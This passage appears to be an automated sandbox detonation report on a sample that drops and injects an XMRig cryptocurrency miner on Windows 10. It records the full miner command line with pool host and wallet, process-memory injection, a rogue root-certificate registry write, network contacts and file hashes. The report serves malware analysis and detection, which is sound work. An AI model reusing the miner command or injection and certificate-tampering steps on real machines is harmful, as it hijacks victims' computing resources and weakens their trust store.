| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3684 wrote to memory of 4592 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3684 wrote to memory of 4592 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4592-16-0x000001D791460000-0x000001D791480000-memory.dmp
memory/4592-17-0x000001D7914D0000-0x000001D7914F0000-memory.dmp
memory/4592-18-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-19-0x000001D825520000-0x000001D825540000-memory.dmp
memory/4592-20-0x000001D825750000-0x000001D825770000-memory.dmp
memory/4592-21-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-22-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-25-0x000001D825750000-0x000001D825770000-memory.dmp
memory/4592-24-0x000001D825520000-0x000001D825540000-memory.dmp
memory/4592-23-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-26-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-27-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-28-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-29-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-30-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-31-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-32-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-33-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-34-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-35-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-36-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-37-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-38-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-39-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-40-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-41-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-42-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-43-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-44-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-45-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-46-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-47-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-48-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-49-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-50-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-51-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-52-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-53-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-54-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-55-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-56-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-57-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-58-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-59-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-60-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-61-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-62-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-63-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-64-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-65-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-66-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-67-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-68-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-69-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-70-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-71-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-72-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-73-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-74-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-75-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-76-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-77-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-78-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-79-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-80-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-81-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-82-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-83-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-84-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:02
Platform
win10v2004-20240226-en
Max time kernel
1797s
Max time network
1809s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3440 wrote to memory of 1780 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3440 wrote to memory of 1780 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4136 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3756 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.178.10:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.253.116.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.242.123.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1780-16-0x0000029647060000-0x0000029647080000-memory.dmp
memory/1780-17-0x00000296470B0000-0x00000296470D0000-memory.dmp
memory/1780-18-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-21-0x00000296470D0000-0x00000296470F0000-memory.dmp
memory/1780-19-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-20-0x00000296470F0000-0x0000029647110000-memory.dmp
memory/1780-22-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-23-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-25-0x00000296470D0000-0x00000296470F0000-memory.dmp
memory/1780-24-0x00000296470F0000-0x0000029647110000-memory.dmp
memory/1780-26-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-27-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-28-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-29-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-30-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-31-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-32-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-33-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-34-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-35-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-36-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-37-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-38-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-39-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-40-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-41-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-42-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-43-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-44-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-45-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-46-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-47-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-48-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-49-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-50-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-51-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-52-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-53-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-54-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-55-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-56-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-57-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-58-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-59-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-60-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-61-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-62-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-63-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-64-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-65-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-66-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-67-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-68-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-69-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-70-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-71-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-72-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-73-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-74-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-75-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-76-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-77-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-78-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-79-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-80-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-81-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-82-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-83-0x00007FF695500000-0x00007FF696003000-memory.dmp
memory/1780-84-0x00007FF695500000-0x00007FF696003000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:02
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
